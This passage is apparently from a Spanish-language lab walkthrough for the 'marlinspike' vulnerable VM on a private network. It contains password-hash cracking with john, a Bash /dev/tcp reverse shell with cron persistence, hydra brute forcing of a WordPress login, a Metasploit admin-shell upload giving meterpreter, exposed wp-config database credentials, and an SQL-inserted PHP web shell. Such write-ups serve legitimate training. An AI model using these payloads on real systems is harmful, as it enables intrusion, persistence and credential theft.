\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ unshadow passwd shadow > p.txt\n\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ rm ~\/.john\/john.pot \n\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ john p.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 8 OpenMP threads\nProceeding with single, rules:Single\nPress 'q' or Ctrl-C to abort, almost any other key for status\nWarning: Only 13 candidates buffered for the current salt, minimum 32 needed for performance.\nmarlinspike (marlinspike) \n1g 0:00:00:00 DONE 1\/3 (2025-07-24 13:35) 100.0g\/s 1300p\/s 1300c\/s 1300C\/s marlinspike..MarlinspikeMarlinspike\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\n\n\nAlternativa 3: Persistencia con cronjob y reverse shell en Bash<\/h3>\n\n\n\n
Reverse shell en Bash usando \/dev\/tcp<\/h4>\n\n\n\n
bash -i >& \/dev\/tcp\/192.168.40.137\/4444 0>&1<\/code><\/pre>\n\n\n\nAutomatizaci\u00f3n con cron<\/h4>\n\n\n\n
echo \"* * * * * bash -i >& \/dev\/tcp\/192.168.40.137\/4444 0>&1\" >> \/tmp\/persist\ncrontab \/tmp\/persist<\/code><\/pre>\n\n\n\nAn\u00e1lisis del servidor web Apache<\/h2>\n\n\n\n
Enumeraci\u00f3n web<\/h3>\n\n\n\n
An\u00e1lisis con Gobuster<\/h4>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.40.138 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.40.138\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/secret (Status: 301) [Size: 317] [--> http:\/\/192.168.40.138\/secret\/] \n\/server-status (Status: 403) [Size: 279]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\n\n\nAn\u00e1lisis con Nikto<\/h4>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ nikto -h http:\/\/192.168.40.138 \n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.40.138\n+ Target Hostname: 192.168.40.138\n+ Target Port: 80\n+ Start Time: 2025-07-25 23:09:37 (GMT2)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.18 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. \n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: b1, size: 55e1c7758dcdb, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.18 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .\n+ \/secret\/: Drupal Link header found with value: <http:\/\/vtcsec\/secret\/index.php\/wp-json\/>; rel=\"https:\/\/api.w.org\/\". See: https:\/\/www.drupal.org\/\n+ \/secret\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host\n+ End Time: 2025-07-25 23:09:54 (GMT2) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\n\n\nAnalizando WordPress<\/h2>\n\n\n\n
\n<\/a>echo \"192.168.40.138 vtcsec\" | sudo tee -a \/etc\/hosts<\/code><\/pre>\n\n\n\nEnumeraci\u00f3n en WordPress<\/h3>\n\n\n\n
\n<\/a>\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ wpscan --url http:\/\/192.168.40.138\/secret --enumerate u \n[+] URL: http:\/\/192.168.40.138\/secret\/ [192.168.40.138]\nInteresting Finding(s):\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.18 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n[+] XML-RPC seems to be enabled: http:\/\/192.168.40.138\/secret\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n[+] WordPress readme found: http:\/\/192.168.40.138\/secret\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.40.138\/secret\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/192.168.40.138\/secret\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=4.9'\n | Confirmed By: Meta Generator (Passive Detection)\n | - http:\/\/192.168.40.138\/secret\/, Match: 'WordPress 4.9'\n[i] The main theme could not be detected.\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 <> (10 \/ 10) 100.00% Time: 00:00:00\n[i] User(s) Identified:\n[+] admin\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https:\/\/wpscan.com\/register<\/code><\/pre>\n\n\n\nAcceso con credenciales por defecto<\/h3>\n\n\n\n
\n<\/a>Acceso por fuerza bruta<\/h3>\n\n\n\n
\u250c\u2500\u2500(osboxes\u327fosboxes)-[~\/Desktop\/marlinspike]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.40.138 http-form-post '\/secret\/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-07-30 22:03:44\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.40.138:80\/secret\/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location\n[STATUS] 4154.00 tries\/min, 4154 tries in 00:01h, 14340244 to do in 57:33h, 16 active\n[STATUS] 4129.33 tries\/min, 12388 tries in 00:03h, 14332010 to do in 57:51h, 16 active\n[80][http-post-form] host: 192.168.40.138 login: admin password: admin\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-07-30 22:08:32<\/code><\/pre>\n\n\n\n\n
\n
Pentesting en WordPress: explotaci\u00f3n y persistencia<\/h3>\n\n\n\n
Explotaci\u00f3n del panel de administraci\u00f3n<\/h4>\n\n\n\n
msf6 exploit(unix\/webapp\/wp_crop_rce) > use exploit\/unix\/webapp\/wp_admin_shell_upload\n[*] No payload configured, defaulting to php\/meterpreter\/reverse_tcp\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set RHOSTS 192.168.40.138\nRHOSTS => 192.168.40.138\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set TARGETURI \/secret\nTARGETURI => \/secret\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set USERNAME admin\nUSERNAME => admin\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set PASSWORD admin\nPASSWORD => admin\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > set LHOST 192.168.40.137\nLHOST => 192.168.40.137\nmsf6 exploit(unix\/webapp\/wp_admin_shell_upload) > exploit\n[*] Started reverse TCP handler on 192.168.40.137:4444 \n[*] Authenticating with WordPress using admin:admin...\n[+] Authenticated with WordPress\n[*] Preparing payload...\n[*] Uploading payload...\n[*] Executing the payload at \/secret\/wp-content\/plugins\/WDRxVQMxpC\/DnCoYqYwFk.php...\n[*] Sending stage (40004 bytes) to 192.168.40.138\n[+] Deleted DnCoYqYwFk.php\n[+] Deleted WDRxVQMxpC.php\n[+] Deleted ..\/WDRxVQMxpC\n[*] Meterpreter session 3 opened (192.168.40.137:4444 -> 192.168.40.138:45728) at 2025-07-30 23:29:28 +0200\n\nmeterpreter > [*] Meterpreter session 1 opened (192.168.40.137:4444 -> 192.168.40.138:45696) at 2025-07-30 23:31:06 +0200<\/code><\/pre>\n\n\n\nmeterpreter > getuid\nServer username: www-data\nmeterpreter > shell\nProcess 10609 created.\nChannel 0 created.\nsh: 0: getcwd() failed: No such file or directory\nsh: 0: getcwd() failed: No such file or directory\n\nwhoami\nwww-data<\/code><\/pre>\n\n\n\nAn\u00e1lisis del fichero de configuraci\u00f3n de WordPress<\/h4>\n\n\n\n
cat \/var\/www\/html\/secret\/wp-config.php\n<?php\n\n\/\/ ** MySQL settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine('DB_NAME', 'wp_myblog');\n\n\/** MySQL database username *\/\ndefine('DB_USER', 'root');\n\n\/** MySQL database password *\/\ndefine('DB_PASSWORD', 'arootmysqlpass');<\/code><\/pre>\n\n\n\nIntento de persistencia por SQL Injection manual<\/h4>\n\n\n\n
mysqldump -u root -p arootmysqlpass > \/tmp\/wordpress_backup.sql<\/code><\/pre>\n\n\n\nmysql -u root -p'arootmysqlpass'\nSHOW DATABASES;\nUSE wp_myblog;\nSELECT * FROM wp_users;<\/code><\/pre>\n\n\n\nmysql> INSERT INTO wp_posts (post_author, post_date, post_date_gmt, post_content, post_title, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping,pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count) VALUES (1, NOW(), NOW(), '<?php system($_GET[\"cmd\"]); ?>', 'Hacked', '', 'publish', 'closed', 'closed', '', 'hacked-shell', '', '', NOW(), NOW(), '', 0, '', 0, 'post', '', 0); \nQuery OK, 1 row affected (0.00 sec) \n\nmysql> SELECT ID FROM wp_posts WHERE post_title = 'Hacked';\n+----+ \n| ID | \n+----+\n| 15 | \n+----+ \n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\nBackdoor alternativa: Plug-in modificado<\/h4>\n\n\n\n